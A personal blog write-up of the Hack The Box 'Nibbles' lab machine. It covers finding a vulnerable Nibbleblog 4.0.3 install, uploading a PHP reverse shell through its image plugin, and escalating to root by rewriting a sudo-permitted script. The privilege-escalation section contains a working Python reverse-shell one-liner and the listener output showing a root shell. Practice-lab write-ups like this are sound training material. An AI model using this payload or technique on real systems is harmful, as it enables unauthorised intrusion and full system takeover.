---
layout: post
title:  "HTB: Nibbles"
date:   2021-03-07 21:00:00 +1100
category: hacking
---

## Nibbles
After Bashed is Traceback but I've done that before; next is Nibbles.

## Ports
SSH and HTTP only.

## HTTP
The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It's running a CMS called nibbleblog; searchsploit says there are two exploits; SQLi in version 3 and an arbitrary file upload in version 4.0.3. It's not immediately clear which we have.

Some enumeration reveals http://10.10.10.75/nibbleblog/README:

>====== Nibbleblog ======  
Version: v4.0.3  
Codename: Coffee  
Release date: 2014-04-01  

So we're after the arbitrary file upload; but it needs authentication. I try bruteforcing the login, but it has a protection mechanism whereby you are locked out after only a few attempts. I google for how to defeat it, but all of the results are Nibbles writeups! 

This [blog](https://eightytwo.net/blog/brute-forcing-the-admin-password-on-nibbles/) talks about how to get around the bruteforce prevention without spoiling the rest of the box, but it also gives up the password. I feel a bit conflicted about this, but I use it and log in.

I also fork the repo with the script (Python) for future reference.

## Yeeting Metasploit?
The exploit from Searchsploit is a Metasploit module. Nah, let's see if we can do it manually. It looks fairly straightfoward. We use the GUI to upload a file (the Pentestmonkey PHP reverse shell) at http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

This prints a bunch of warnings: e.g. 

>Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26

But even so it does work. We visit the shell (it gets renamed to image.php) at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php and we get our shell

## Privesc
We are *nibbler*. My shell is a bit dodgy and *sudo -l* won't work. However it works via linpeas for some reason, and we can run */home/nibbler/personal/stuff/monitor.sh* as root. Okey dokey. This file doesn't actually exist, but there is a zipfile called personal which we can unzip and it creates the path and file. We own monitor.sh so we can make it whatever we want. I try a few payloads before I get one that works:

{% highlight html %}
nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh
rm monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh
<er/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh              
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
< os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ !33
!33
sudo -u root /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
{% endhighlight %}

In my listener:

{% highlight shell %}
┌──(root💀kali)-[/opt/htb/nibbles]
└─# nc -nvlp 1235                                                                                                                                                                                1 ⨯
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.75] 38506
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lash
total 32K
4.0K drwx------  4 root root 4.0K Dec 15 05:09 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 15 05:13 ..
   0 -rw-------  1 root root    0 Dec 29  2017 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwx------  2 root root 4.0K Dec 10  2017 .cache
4.0K drwxr-xr-x  2 root root 4.0K Dec 10  2017 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root 1.1K Dec 15 05:09 .viminfo
4.0K -r--------  1 root root   33 Mar  7 03:44 root.txt
{% endhighlight %}

So that was that but I can't help feel I missed the most important part of this challenge. Anyway; next cab off the rank is Optimum. I'll have a crack at that tomorrow.
